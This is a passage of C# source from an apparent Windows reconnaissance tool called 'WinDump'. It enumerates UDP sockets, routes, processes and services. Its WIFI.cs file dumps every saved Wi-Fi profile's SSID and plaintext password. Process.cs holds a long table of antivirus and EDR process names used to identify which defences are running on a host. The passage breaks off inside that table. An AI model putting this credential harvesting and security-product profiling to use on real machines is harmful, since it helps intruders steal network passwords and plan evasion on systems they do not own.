dataTable.Columns.Add("LocalPort"); 218 | dataTable.Columns.Add("PID"); 219 | uint ret = GetExtendedUdpTable(IntPtr.Zero, ref buffSize, true, AF_INET, UDP_TABLE_CLASS.UDP_TABLE_OWNER_PID); 220 | IntPtr buffTable = Marshal.AllocHGlobal(buffSize); 221 | 222 | try 223 | { 224 | ret = GetExtendedUdpTable(buffTable, ref buffSize, true, AF_INET, UDP_TABLE_CLASS.UDP_TABLE_OWNER_PID); 225 | if (ret != 0) 226 | { 227 | return dataTable; 228 | } 229 | 230 | // get the number of entries in the table 231 | //MibTcpTable tab = (MibTcpTable)Marshal.PtrToStructure(buffTable, typeof(MibTcpTable)); 232 | MIB_UDPTABLE_OWNER_PID 
tab = (MIB_UDPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_UDPTABLE_OWNER_PID)); 233 | //IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.numberOfEntries) ); 234 | IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.dwNumEntries)); 235 | // buffer we will be returning 236 | //tTable = new TcpRow[tab.numberOfEntries]; 237 | 238 | //for (int i = 0; i < tab.numberOfEntries; i++) 239 | for (int i = 0; i < tab.dwNumEntries; i++) 240 | { 241 | //MibTcpRow_Owner_Pid tcpRow = (MibTcpRow_Owner_Pid)Marshal.PtrToStructure(rowPtr, typeof(MibTcpRow_Owner_Pid)); 242 | MIB_UDPROW_OWNER_PID udpRow = (MIB_UDPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_UDPROW_OWNER_PID)); 243 | //tTable[i] = new TcpRow(tcpRow); 244 | rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(udpRow)); // next entry 245 | dataTable.Rows.Add(udpRow.LocalAddress, udpRow.LocalPort,udpRow.PID); 246 | } 247 | 248 | } 249 | finally 250 | { 251 | // Free the Memory 252 | Marshal.FreeHGlobal(buffTable); 253 | } 254 | 255 | 256 | 257 | return dataTable; 258 | } 259 | 260 | } 261 | } 262 | -------------------------------------------------------------------------------- /Network/Route.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace WinDump 9 | { 10 | 11 | internal class Routing 12 | { 13 | [StructLayout(LayoutKind.Sequential)] 14 | public struct MIB_IPFORWARDROW 15 | { 16 | [MarshalAs(UnmanagedType.U4)] 17 | public uint dwForwardDest; // IP addr of destination 18 | [MarshalAs(UnmanagedType.U4)] 19 | public uint dwForwardMask; // subnetwork mask of destination 20 | [MarshalAs(UnmanagedType.U4)] 21 | public int dwForwardPolicy; // conditions for multi-path route 22 | [MarshalAs(UnmanagedType.U4)] 23 | public uint dwForwardNextHop; // IP address 
of next hop 24 | [MarshalAs(UnmanagedType.U4)] 25 | public int dwForwardIfIndex; // index of interface 26 | [MarshalAs(UnmanagedType.U4)] 27 | public int dwForwardType; // route type 28 | [MarshalAs(UnmanagedType.U4)] 29 | public int dwForwardProto; // protocol that generated route 30 | [MarshalAs(UnmanagedType.U4)] 31 | public int dwForwardAge; // age of route 32 | [MarshalAs(UnmanagedType.U4)] 33 | public int dwForwardNextHopAS; // autonomous system number 34 | [MarshalAs(UnmanagedType.U4)] 35 | public int dwForwardMetric1; // protocol-specific metric 36 | [MarshalAs(UnmanagedType.U4)] 37 | public int dwForwardMetric2; // protocol-specific metric 38 | [MarshalAs(UnmanagedType.U4)] 39 | public int dwForwardMetric3; // protocol-specific metric 40 | [MarshalAs(UnmanagedType.U4)] 41 | public int dwForwardMetric4; // protocol-specific metric 42 | [MarshalAs(UnmanagedType.U4)] 43 | public int dwForwardMetric5; // protocol-specific metric 44 | public System.Net.IPAddress ForwardDest 45 | { 46 | get 47 | { 48 | return new System.Net.IPAddress(dwForwardDest); 49 | } 50 | } 51 | public System.Net.IPAddress ForwardNextHop 52 | { 53 | get 54 | { 55 | return new System.Net.IPAddress(dwForwardNextHop); 56 | } 57 | } 58 | public System.Net.IPAddress ForwardMask 59 | { 60 | get 61 | { 62 | return new System.Net.IPAddress(dwForwardMask); 63 | } 64 | } 65 | } 66 | 67 | [DllImport("IpHlpApi.dll")] 68 | [return: MarshalAs(UnmanagedType.U4)] 69 | static extern int GetIpForwardTable(IntPtr pIpForwardTable, [MarshalAs(UnmanagedType.U4)] ref int pdwSize, bool bOrder); 70 | const int ERROR_INSUFFICIENT_BUFFER = 122; 71 | 72 | internal static DataTable GetRoute() 73 | { 74 | var dataTable = new DataTable(); 75 | // The number of bytes needed. 76 | int bytesNeeded = 0; 77 | // The result from the API call. 78 | int result = GetIpForwardTable(IntPtr.Zero, ref bytesNeeded, false); 79 | 80 | // Call the function, expecting an insufficient buffer. 
81 | if (result != ERROR_INSUFFICIENT_BUFFER) 82 | { 83 | // Throw an exception. 84 | throw new Win32Exception(result); 85 | } 86 | 87 | // Allocate the memory, do it in a try/finally block, to ensure 88 | // that it is released. 89 | IntPtr buffer = IntPtr.Zero; 90 | 91 | try 92 | { 93 | // Allocate the memory. 94 | buffer = Marshal.AllocCoTaskMem(bytesNeeded); 95 | 96 | // Make the call again. If it did not succeed, then 97 | // raise an error. 98 | result = GetIpForwardTable(buffer, ref bytesNeeded, false); 99 | 100 | // If the result is not 0 (no error), then throw an exception. 101 | if (result != 0) 102 | { 103 | // Throw an exception. 104 | throw new Win32Exception(result); 105 | } 106 | 107 | // Now we have the buffer, we have to marshal it. We can read 108 | // the first 4 bytes to get the length of the buffer. 109 | int entries = Marshal.ReadInt32(buffer); 110 | 111 | // Increment the memory pointer by the size of the int. 112 | IntPtr currentBuffer = new IntPtr(buffer.ToInt64() + Marshal.SizeOf(new int())); 113 | 114 | // Allocate an array of entries. 115 | ; 116 | dataTable.Columns.Add("ForwardDest"); 117 | dataTable.Columns.Add("ForwardMask"); 118 | dataTable.Columns.Add("ForwardNextHop"); 119 | dataTable.Columns.Add("ForwardIfIndex"); 120 | 121 | // Cycle through the entries. 122 | for (int index = 0; index < entries; index++) 123 | { 124 | // Call PtrToStructure, getting the structure information. 125 | MIB_IPFORWARDROW table = (MIB_IPFORWARDROW)Marshal.PtrToStructure(new 126 | IntPtr(currentBuffer.ToInt64() + (index * 127 | Marshal.SizeOf(typeof(MIB_IPFORWARDROW)))), typeof(MIB_IPFORWARDROW)); 128 | dataTable.Rows.Add(table.ForwardDest, table.ForwardMask, table.ForwardNextHop,table.dwForwardIfIndex); 129 | } 130 | 131 | } 132 | finally 133 | { 134 | // Release the memory. 
135 | Marshal.FreeCoTaskMem(buffer); 136 | } 137 | return dataTable; 138 | } 139 | 140 | } 141 | } 142 | -------------------------------------------------------------------------------- /Network/WIFI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Xml; 7 | 8 | namespace WinDump 9 | { 10 | internal class WIFI 11 | { 12 | internal static DataTable GetWIFI() 13 | { 14 | DataTable dt = new DataTable(); 15 | dt.Columns.Add("SSID"); 16 | dt.Columns.Add("Pwd"); 17 | const int dwClientVersion = 2; 18 | IntPtr clientHandle = IntPtr.Zero; 19 | IntPtr pdwNegotiatedVersion = IntPtr.Zero; 20 | IntPtr pInterfaceList = IntPtr.Zero; 21 | WLAN_INTERFACE_INFO_LIST interfaceList; 22 | WLAN_PROFILE_INFO_LIST wifiProfileList; 23 | Guid InterfaceGuid; 24 | IntPtr pAvailableNetworkList = IntPtr.Zero; 25 | string wifiXmlProfile = null; 26 | IntPtr wlanAccess = IntPtr.Zero; 27 | IntPtr profileList = IntPtr.Zero; 28 | string profileName = ""; 29 | try 30 | { 31 | // Open Wifi Handle 32 | WlanOpenHandle(dwClientVersion, IntPtr.Zero, out pdwNegotiatedVersion, ref clientHandle); 33 | 34 | WlanEnumInterfaces(clientHandle, IntPtr.Zero, ref pInterfaceList); 35 | interfaceList = new WLAN_INTERFACE_INFO_LIST(pInterfaceList); 36 | InterfaceGuid = interfaceList.InterfaceInfo[0].InterfaceGuid; 37 | WlanGetProfileList(clientHandle, InterfaceGuid, IntPtr.Zero, ref profileList); 38 | wifiProfileList = new WLAN_PROFILE_INFO_LIST(profileList); 39 | if (wifiProfileList.dwNumberOfItems <= 0) return null; 40 | 41 | 42 | for (int i = 0; i < wifiProfileList.dwNumberOfItems; i++) 43 | { 44 | try 45 | { 46 | profileName = (wifiProfileList.ProfileInfo[i]).strProfileName; 47 | int decryptKey = 63; 48 | WlanGetProfile(clientHandle, InterfaceGuid, profileName, IntPtr.Zero, out wifiXmlProfile, ref decryptKey, out 
wlanAccess); 49 | XmlDocument xmlProfileXml = new XmlDocument(); 50 | xmlProfileXml.LoadXml(wifiXmlProfile); 51 | XmlNodeList pathToSSID = xmlProfileXml.SelectNodes("//*[name()='WLANProfile']/*[name()='SSIDConfig']/*[name()='SSID']/*[name()='name']"); 52 | XmlNodeList pathToPassword = xmlProfileXml.SelectNodes("//*[name()='WLANProfile']/*[name()='MSM']/*[name()='security']/*[name()='sharedKey']/*[name()='keyMaterial']"); 53 | foreach (XmlNode ssid in pathToSSID) 54 | { 55 | 56 | foreach (XmlNode password in pathToPassword) 57 | { 58 | dt.Rows.Add(ssid.InnerText, password.InnerText); 59 | 60 | } 61 | 62 | } 63 | } 64 | catch 65 | { 66 | } 67 | } 68 | WlanCloseHandle(clientHandle, IntPtr.Zero); 69 | } 70 | catch { } 71 | return dt; 72 | } 73 | [DllImport("Wlanapi.dll")] 74 | public static extern int WlanOpenHandle(int dwClientVersion, IntPtr pReserved, [Out] out IntPtr pdwNegotiatedVersion, ref IntPtr ClientHandle); 75 | 76 | [DllImport("Wlanapi", EntryPoint = "WlanCloseHandle")] 77 | public static extern uint WlanCloseHandle([In] IntPtr hClientHandle, IntPtr pReserved); 78 | 79 | 80 | [DllImport("Wlanapi", EntryPoint = "WlanEnumInterfaces")] 81 | public static extern uint WlanEnumInterfaces([In] IntPtr hClientHandle, IntPtr pReserved, ref IntPtr ppInterfaceList); 82 | 83 | 84 | [DllImport("wlanapi.dll", SetLastError = true)] 85 | public static extern uint WlanGetProfile([In] IntPtr clientHandle, [In, MarshalAs(UnmanagedType.LPStruct)] Guid interfaceGuid, [In, MarshalAs(UnmanagedType.LPWStr)] string profileName, [In] IntPtr pReserved, [Out, MarshalAs(UnmanagedType.LPWStr)] out string profileXml, [In, Out, Optional] ref int flags, [Out, Optional] out IntPtr pdwGrantedAccess); 86 | 87 | [DllImport("wlanapi.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)] 88 | public static extern uint WlanGetProfileList([In] IntPtr clientHandle, [In, MarshalAs(UnmanagedType.LPStruct)] Guid interfaceGuid, [In] IntPtr pReserved, ref IntPtr profileList); 89 | 
[StructLayout(LayoutKind.Sequential)] 90 | public struct WLAN_INTERFACE_INFO_LIST 91 | { 92 | 93 | public int dwNumberofItems; 94 | public int dwIndex; 95 | public WLAN_INTERFACE_INFO[] InterfaceInfo; 96 | 97 | 98 | public WLAN_INTERFACE_INFO_LIST(IntPtr pList) 99 | { 100 | dwNumberofItems = (int)Marshal.ReadInt64(pList, 0); 101 | dwIndex = (int)Marshal.ReadInt64(pList, 4); 102 | InterfaceInfo = new WLAN_INTERFACE_INFO[dwNumberofItems]; 103 | for (int i = 0; i < dwNumberofItems; i++) 104 | { 105 | IntPtr pItemList = new IntPtr(pList.ToInt64() + (i * 532) + 8); 106 | WLAN_INTERFACE_INFO wii = new WLAN_INTERFACE_INFO(); 107 | wii = (WLAN_INTERFACE_INFO)Marshal.PtrToStructure(pItemList, typeof(WLAN_INTERFACE_INFO)); 108 | InterfaceInfo[i] = wii; 109 | } 110 | } 111 | } 112 | 113 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 114 | public struct WLAN_INTERFACE_INFO 115 | { 116 | public Guid InterfaceGuid; 117 | 118 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 256)] 119 | public string strInterfaceDescription; 120 | 121 | } 122 | 123 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 124 | public struct WLAN_PROFILE_INFO 125 | { 126 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 256)] 127 | public string strProfileName; 128 | public WlanProfileFlags ProfileFLags; 129 | } 130 | 131 | [Flags] 132 | public enum WlanProfileFlags 133 | { 134 | AllUser = 0, 135 | GroupPolicy = 1, 136 | User = 2 137 | } 138 | 139 | public struct WLAN_PROFILE_INFO_LIST 140 | { 141 | public int dwNumberOfItems; 142 | public int dwIndex; 143 | public WLAN_PROFILE_INFO[] ProfileInfo; 144 | 145 | public WLAN_PROFILE_INFO_LIST(IntPtr ppProfileList) 146 | { 147 | dwNumberOfItems = (int)Marshal.ReadInt64(ppProfileList); 148 | dwIndex = (int)Marshal.ReadInt64(ppProfileList, 4); 149 | ProfileInfo = new WLAN_PROFILE_INFO[dwNumberOfItems]; 150 | IntPtr ppProfileListTemp = new IntPtr(ppProfileList.ToInt64() + 8); 151 | 152 | for (int i = 0; i < dwNumberOfItems; 
i++) 153 | { 154 | ppProfileList = new IntPtr(ppProfileListTemp.ToInt64() + i * Marshal.SizeOf(typeof(WLAN_PROFILE_INFO))); 155 | ProfileInfo[i] = (WLAN_PROFILE_INFO)Marshal.PtrToStructure(ppProfileList, typeof(WLAN_PROFILE_INFO)); 156 | } 157 | } 158 | } 159 | } 160 | } 161 | -------------------------------------------------------------------------------- /Process.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Text; 5 | 6 | namespace WinDump 7 | { 8 | class Process 9 | { 10 | static DataTable cacheProcess; 11 | internal static DataTable GetProcess() 12 | { 13 | if (cacheProcess == null) 14 | { 15 | cacheProcess = Utils.Query("Select Name,Processid,SessionId,ExecutablePath,CommandLine FROM Win32_Process"); 16 | } 17 | return cacheProcess; 18 | } 19 | internal static DataTable GetService() 20 | { 21 | return Utils.Query("SELECT Name,ProcessId,State,DisplayName,PathName FROM Win32_Service"); 22 | } 23 | 24 | internal static DataTable GetAV() 25 | { 26 | 27 | var process = GetProcess(); 28 | var dt = process.Clone(); 29 | var col = dt.Columns.Add("AV"); 30 | col.SetOrdinal(0); 31 | 32 | foreach (DataRow row in process.Rows) 33 | { 34 | var name = row["name"].ToString(); 35 | if (av.ContainsKey(name)) 36 | { 37 | var avname = av[name]; 38 | row.ItemArray.Clone(); 39 | var objs = new object[row.ItemArray.Length + 1]; 40 | objs[0] = avname; 41 | row.ItemArray.CopyTo(objs, 1); 42 | dt.Rows.Add(objs); 43 | } 44 | 45 | } 46 | return dt; 47 | } 48 | 49 | static Dictionary av = new Dictionary { 50 | {"aylaunch.exe", "ALYac"}, 51 | {"ayupdate2.exe", "ALYac"}, 52 | {"AYRTSrv.exe", "ALYac"}, 53 | {"AYAgent.exe", "ALYac"}, 54 | {"AVGSvc.exe", "AVG"}, 55 | {"AVGUI.exe", "AVG"}, 56 | {"avgwdsvc.exe", "AVG"}, 57 | {"avg.exe", "AVG"}, 58 | {"avgaurd.exe", "AVG"}, 59 | {"avgemc.exe", "AVG"}, 60 | {"avgrsx.exe", "AVG"}, 61 | {"avgserv.exe", "AVG"}, 62 | 
{"avgw.exe", "AVG"}, 63 | {"arsm.exe", "Acronis"}, 64 | {"acronis_license_service.exe", "Acronis"}, 65 | {"AdAwareService.exe", "Ad-Aware"}, 66 | {"Ad-Aware.exe", "Ad-Aware"}, 67 | {"AdAware.exe", "Ad-Aware"}, 68 | {"patray.exe", "AhnLab-V3"}, 69 | {"V3Svc.exe", "AhnLab-V3"}, 70 | {"arcavir.exe", "Arcabit"}, 71 | {"arcadc.exe", "Arcabit"}, 72 | {"ArcaVirMaster.exe", "Arcabit"}, 73 | {"ArcaMainSV.exe", "Arcabit"}, 74 | {"ArcaTasksService.exe", "Arcabit"}, 75 | {"ashDisp.exe", "Avast"}, 76 | {"AvastUI.exe", "Avast"}, 77 | {"AvastSvc.exe", "Avast"}, 78 | {"AvastBrowser.exe", "Avast"}, 79 | {"AfwServ.exe", "Avast"}, 80 | {"avcenter.exe", "Avira AntiVirus(小红伞)"}, 81 | {"avguard.exe", "Avira AntiVirus(小红伞)"}, 82 | {"avgnt.exe", "Avira AntiVirus(小红伞)"}, 83 | {"sched.exe", "Avira AntiVirus(小红伞)"}, 84 | {"BaiduSdSvc.exe", "Baidu AntiVirus"}, 85 | {"BaiduSdTray.exe", "Baidu AntiVirus"}, 86 | {"BaiduSd.exe", "Baidu AntiVirus"}, 87 | {"bddownloader.exe", "百度卫士 or Baidu AntiVirus"}, 88 | {"baiduansvx.exe", "百度卫士-主进程 or Baidu AntiVirus"}, 89 | {"Bdagent.exe", "BitDefender"}, 90 | {"BitDefenderCom.exe", "BitDefender"}, 91 | {"vsserv.exe", "BitDefender"}, 92 | {"bdredline.exe", "BitDefender"}, 93 | {"secenter.exe", "BitDefender"}, 94 | {"bdservicehost.exe", "BitDefender"}, 95 | {"BITDEFENDER.exe", "BitDefender"}, 96 | {"BKavService.exe", "Bkav"}, 97 | {"Bka.exe", "Bkav"}, 98 | {"BkavUtil.exe", "Bkav"}, 99 | {"BLuPro.exe", "Bkav"}, 100 | {"QUHLPSVC.exe", "CAT-QuickHeal"}, 101 | {"onlinent.exe", "CAT-QuickHeal"}, 102 | {"sapissvc.exe", "CAT-QuickHeal"}, 103 | {"scanwscs.exe", "CAT-QuickHeal"}, 104 | {"CMCTrayIcon.exe", "CMC"}, 105 | {"freshclam.exe", "ClamAV"}, 106 | {"cpf.exe", "Comodo"}, 107 | {"cavwp.exe", "Comodo"}, 108 | {"ccavsrv.exe", "Comodo"}, 109 | {"cmdvirth.exe", "Comodo"}, 110 | {"csfalconservice.exe", "CrowdStrike Falcon(猎鹰)"}, 111 | {"CSFalconContainer.exe", "CrowdStrike Falcon(猎鹰)"}, 112 | {"CybereasonRansomFree.exe", "Cybereason"}, 113 | 
{"CybereasonRansomFreeServiceHost.exe", "Cybereason"}, 114 | {"CybereasonAV.exe", "Cybereason"}, 115 | {"CylanceSvc.exe", "Cylance"}, 116 | {"vsedsps.exe", "Cyren"}, 117 | {"vseamps.exe", "Cyren"}, 118 | {"vseqrts.exe", "Cyren"}, 119 | {"drwebcom.exe", "DrWeb"}, 120 | {"spidernt.exe", "DrWeb"}, 121 | {"drwebscd.exe", "DrWeb"}, 122 | {"drweb32w.exe", "DrWeb"}, 123 | {"dwengine.exes", "DrWeb"}, 124 | {"egui.exe", "ESET-NOD32"}, 125 | {"ecls.exe", "ESET-NOD32"}, 126 | {"ekrn.exe", "ESET-NOD32"}, 127 | {"eguiProxy.exe", "ESET-NOD32"}, 128 | {"EShaSrv.exe", "ESET-NOD32"}, 129 | {"tmpfw.exe", "Trend Micro(趋势科技)"}, 130 | {"tmlisten.exe", "Trend Micro(趋势科技)"}, 131 | {"coreServiceShell.exe", "Trend Micro(趋势科技)"}, 132 | {"coreFrameworkHost.exe", "Trend Micro(趋势科技)"}, 133 | {"uiWatchDog.exe", "Trend Micro(趋势科技)"}, 134 | {"TMLISTEN.exe", "Trend Micro(趋势科技)"}, 135 | {"a2guard.exe", "Emsisoft"}, 136 | {"a2free.exe", "Emsisoft"}, 137 | {"a2service.exe", "Emsisoft"}, 138 | {"endgame.exe", "Endgame"}, 139 | {"F-PROT.exe", "F-Prot"}, 140 | {"FProtTray.exe", "F-Prot"}, 141 | {"FPAVServer.exe", "F-Prot"}, 142 | {"f-stopw.exe", "F-Prot"}, 143 | {"f-prot95.exe", "F-Prot"}, 144 | {"f-agnt95.exe", "F-Prot"}, 145 | {"f-secure.exe", "F-Secure"}, 146 | {"fssm32.exe", "F-Secure"}, 147 | {"Fsorsp64.exe", "F-Secure"}, 148 | {"fsavgui.exe", "F-Secure"}, 149 | {"fameh32.exe", "F-Secure"}, 150 | {"fch32.exe", "F-Secure"}, 151 | {"fih32.exe", "F-Secure"}, 152 | {"fnrb32.exe", "F-Secure"}, 153 | {"fsav32.exe", "F-Secure"}, 154 | {"fsma32.exe", "F-Secure"}, 155 | {"fsmb32.exe", "F-Secure"}, 156 | {"xagtnotif.exe", "FireEye(火眼)"}, 157 | {"xagt.exe", "FireEye(火眼)"}, 158 | {"FortiClient.exe", "Fortinet(飞塔)"}, 159 | {"FortiTray.exe", "Fortinet(飞塔)"}, 160 | {"FortiScand.exe", "Fortinet(飞塔)"}, 161 | {"FortiWF.exe", "Fortinet(飞塔)"}, 162 | {"FortiProxy.exe", "Fortinet(飞塔)"}, 163 | {"FortiESNAC.exe", "Fortinet(飞塔)"}, 164 | {"FortiSSLVPNdaemon.exe", "Fortinet(飞塔)"}, 165 | {"FortiTcs.exe", "Fortinet(飞塔)"}, 166 
| {"FctSecSvr.exe", "Fortinet(飞塔)"}, 167 | {"AVK.exe", "G Data安全软件客户端 or GData"}, 168 | {"avkcl.exe", "GData"}, 169 | {"avkpop.exe", "GData"}, 170 | {"avkservice.exe", "GData"}, 171 | {"GDScan.exe", "G Data扫描器 or GData"}, 172 | {"AVKWCtl.exe", "GData"}, 173 | {"AVKProxy.exe", "G Data杀毒代理 or GData"}, 174 | {"AVKBackupService.exe", "G Data备份服务 or GData"}, 175 | {"guardxservice.exe", "Ikarus"}, 176 | {"guardxkickoff.exe", "Ikarus"}, 177 | {"KVFW.exe", "Jiangmin"}, 178 | {"KVsrvXP.exe", "Jiangmin"}, 179 | {"KVMonXP.exe", "Jiangmin"}, 180 | {"KVwsc.exe", "Jiangmin"}, 181 | {"K7TSecurity.exe", "K7AntiVirus"}, 182 | {"K7TSMain.Exe", "K7AntiVirus"}, 183 | {"K7TSUpdT.exe", "K7AntiVirus"}, 184 | {"avp.exe", "Kaspersky(卡巴斯基)"}, 185 | {"avpcc.exe", "Kaspersky(卡巴斯基)"}, 186 | {"avpm.exe", "Kaspersky(卡巴斯基)"}, 187 | {"kavpf.exe", "Kaspersky(卡巴斯基)"}, 188 | {"kavfs.exe", "Kaspersky(卡巴斯基)"}, 189 | {"klnagent.exe", "Kaspersky(卡巴斯基)"}, 190 | {"kavtray.exe", "Kaspersky(卡巴斯基)"}, 191 | {"kavfswp.exe", "Kaspersky(卡巴斯基)"}, 192 | {"kaspersky.exe", "Kaspersky(卡巴斯基)"}, 193 | {"SDSystemTray.exe", "Max Secure Software"}, 194 | {"MaxRCSystemTray.exe", "Max Secure Software"}, 195 | {"RCSystemTray.exe", "Max Secure Software"}, 196 | {"MaxAVPlusDM.exe", "Max Secure Software"}, 197 | {"LiveUpdateSD.exe", "Max Secure Software"}, 198 | {"MBAMService.exe", "Malwarebytes"}, 199 | {"mbam.exe", "Malwarebytes"}, 200 | {"mbamtray.exe", "Malwarebytes"}, 201 | {"Mcshield.exe", "McAfee(迈克菲)"}, 202 | {"Tbmon.exe", "McAfee(迈克菲)"}, 203 | {"Frameworkservice.exe", "McAfee(迈克菲)"}, 204 | {"firesvc.exe", "McAfee(迈克菲)"}, 205 | {"firetray.exe", "McAfee(迈克菲)"}, 206 | {"hipsvc.exe", "McAfee(迈克菲)"}, 207 | {"mfevtps.exe", "McAfee(迈克菲)"}, 208 | {"mcafeefire.exe", "McAfee(迈克菲)"}, 209 | {"shstat.exe", "McAfee(迈克菲)"}, 210 | {"vstskmgr.exe", "McAfee(迈克菲)"}, 211 | {"engineserver.exe", "McAfee(迈克菲)"}, 212 | {"alogserv.exe", "McAfee(迈克菲)"}, 213 | {"avconsol.exe", "McAfee(迈克菲)"}, 214 | {"cmgrdian.exe", "McAfee(迈克菲)"}, 215 | 
{"cpd.exe", "McAfee(迈克菲)"}, 216 | {"mcmnhdlr.exe", "McAfee(迈克菲)"}, 217 | {"mcvsshld.exe", "McAfee(迈克菲)"}, 218 | {"mcvsrte.exe", "McAfee(迈克菲)"}, 219 | {"mghtml.exe", "McAfee(迈克菲)"}, 220 | {"mpfservice.exe", "McAfee(迈克菲)"}, 221 | {"mpfagent.exe", "McAfee(迈克菲)"}, 222 | {"mpftray.exe", "McAfee(迈克菲)"}, 223 | {"vshwin32.exe", "McAfee(迈克菲)"}, 224 | {"vsstat.exe", "McAfee(迈克菲)"}, 225 | {"guarddog.exe", "McAfee(迈克菲)"}, 226 | {"mfeann.exe", "McAfee(迈克菲)"}, 227 | {"udaterui.exe", "McAfee(迈克菲)"}, 228 | {"naprdmgr.exe", "McAfee(迈克菲)"}, 229 | {"mctray.exe", "McAfee(迈克菲)"}, 230 | {"fcagate.exe", "McAfee(迈克菲)"}, 231 | {"fcag.exe", "McAfee(迈克菲)"}, 232 | {"fcags.exe", "McAfee(迈克菲)"}, 233 | {"fcagswd.exe", "McAfee(迈克菲)"}, 234 | {"macompatsvc.exe", "McAfee(迈克菲)"}, 235 | {"masvc.exe", "McAfee(迈克菲)"}, 236 | {"mcamnsvc.exe", "McAfee(迈克菲)"}, 237 | {"mctary.exe", "McAfee(迈克菲)"}, 238 | {"mfecanary.exe", "McAfee(迈克菲)"}, 239 | {"mfeconsole.exe", "McAfee(迈克菲)"}, 240 | {"mfeesp.exe", "McAfee(迈克菲)"}, 241 | {"mfefire.exe", "McAfee(迈克菲)"}, 242 | {"mfefw.exe", "McAfee(迈克菲)"}, 243 | {"mfemms.exe", "McAfee(迈克菲)"}, 244 | {"mfetp.exe", "McAfee(迈克菲)"}, 245 | {"mfewc.exe", "McAfee(迈克菲)"}, 246 | {"mfewch.exe", "McAfee(迈克菲)"}, 247 | {"MsMpEng.exe", "Microsoft Security Essentials"}, 248 | {"msseces.exe", "Microsoft Security Essentials"}, 249 | {"mssecess.exe", "Microsoft Security Essentials"}, 250 | {"emet_agent.exe", "Microsoft Security Essentials"}, 251 | {"emet_service.exe", "Microsoft Security Essentials"}, 252 | {"drwatson.exe", "Microsoft Security Essentials"}, 253 | {"MpCmdRun.exe", "Microsoft Security Essentials"}, 254 | {"NisSrv.exe", "Microsoft Security Essentials"}, 255 | {"MsSense.exe", "Microsoft Security Essentials"}, 256 | {"MSASCui.exe", "Microsoft Security Essentials"}, 257 | {"MSASCuiL.exe", "Microsoft Security Essentials"}, 258 | {"SecurityHealthService.exe", "Microsoft Security Essentials"}, 259 | {"nanoav.exe", "NANO-Antivirus"}, 260 | {"nanoav64.exe", "NANO-Antivirus"}, 261 | 
{"nanoreport.exe", "NANO-Antivirus"}, 262 | {"nanoreportc.exe", "NANO-Antivirus"}, 263 | {"nanoreportc64.exe", "NANO-Antivirus"}, 264 | {"nanorst.exe", "NANO-Antivirus"}, 265 | {"nanosvc.exe", "NANO-Antivirus"}, 266 | {"PanInstaller.exe", "Palo Alto Networks"}, 267 | {"remupd.exe", "Panda Security"}, 268 | {"apvxdwin.exe", "Panda Security"}, 269 | {"pavproxy.exe", "Panda Security"}, 270 | {"pavsched.exe", "Panda Security"}, 271 | {"360sd.exe", "Qihoo-360"}, 272 | {"360tray.exe", "Qihoo-360"}, 273 | {"ZhuDongFangYu.exe", "Qihoo-360"}, 274 | {"360rp.exe", "Qihoo-360"}, 275 | {"360rps.exe", "Qihoo-360"}, 276 | {"360safe.exe", "Qihoo-360"}, 277 | {"360safebox.exe", "360保险箱 or Qihoo-360"}, 278 | {"QHActiveDefense.exe", "360TotalSecurity(360国际版) or Qihoo-360"}, 279 | {"360skylarsvc.exe", "Qihoo-360"}, 280 | {"LiveUpdate360.exe", "Qihoo-360"}, 281 | {"RavMonD.exe", "Rising"}, 282 | {"rfwmain.exe", "Rising"}, 283 | {"RsMgrSvc.exe", "Rising"}, 284 | {"RavMon.exe", "Rising"}, 285 | {"superantispyware.exe", "SUPERAntiSpyware"}, 286 | {"sascore.exe", "SUPERAntiSpyware"}, 287 | {"SAdBlock.exe", "SUPERAntiSpyware"}, 288 | {"sabsvc.exe", "SUPERAntiSpyware"}, 289 | {"UniversalAVService.exe", "SecureAge APEX"}, 290 | {"EverythingServer.exe", "SecureAge APEX"}, 291 | {"clamd.exe", "SecureAge APEX"}, 292 | {"SavProgress.exe", "Sophos AV"}, 293 | {"icmon.exe", "Sophos AV"}, 294 | {"SavMain.exe", "Sophos AV"}, 295 | {"SophosUI.exe", "Sophos AV"}, 296 | {"SophosFS.exe", "Sophos AV"}, 297 | {"SophosHealth.exe", "Sophos AV"}, 298 | {"SophosSafestore64.exe", "Sophos AV"}, 299 | {"SophosCleanM.exe", "Sophos AV"}, 300 | {"SophosFileScanner.exe", "Sophos AV"}, 301 | {"SophosNtpService.exe", "Sophos AV"}, 302 | {"SophosOsquery.exe", "Sophos AV"}, 303 | {"Sophos UI.exe", "Sophos AV"}, 304 | {"QQPCRTP.exe", "Tencent"}, 305 | {"QQPCTray.exe", "Tencent"}, 306 | {"QQPCMgr.exe", "Tencent"}, 307 | {"QQPCNetFlow.exe", "Tencent"}, 308 | {"QQPCRealTimeSpeedup.exe", "Tencent"}, 309 | {"AMRT.exe", 
